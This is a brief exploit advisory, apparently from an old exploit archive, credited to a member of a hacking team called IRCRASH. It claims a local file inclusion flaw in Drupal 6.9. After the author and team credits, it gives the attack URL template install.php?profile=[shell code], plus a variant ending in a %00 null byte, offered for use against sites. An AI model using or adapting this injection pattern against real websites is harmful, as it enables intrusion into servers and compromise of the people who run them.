Author : Rasool Nasr ------------------------------------------- Discovered by : Rasool Nasr ------------------------------------------- Exploited By : Rasool Nasr ------------------------------------------- E-Mail : rasool.nasr_at_gmail.com ------------------------------------------- WebSite : http://ircrash.com ------------------------------------------- Our Team : ircrash ------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ------------------------------------------- CMS: Drupal ( Version 6.9 ) Download CMS : http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz ------------------------------------------- LFI Exploit : http://[sitename]/drupal/install.php?profile=[shell code] or http://[sitename]/drupal/install.php?profile=[shell code]%00 -------------------------------------------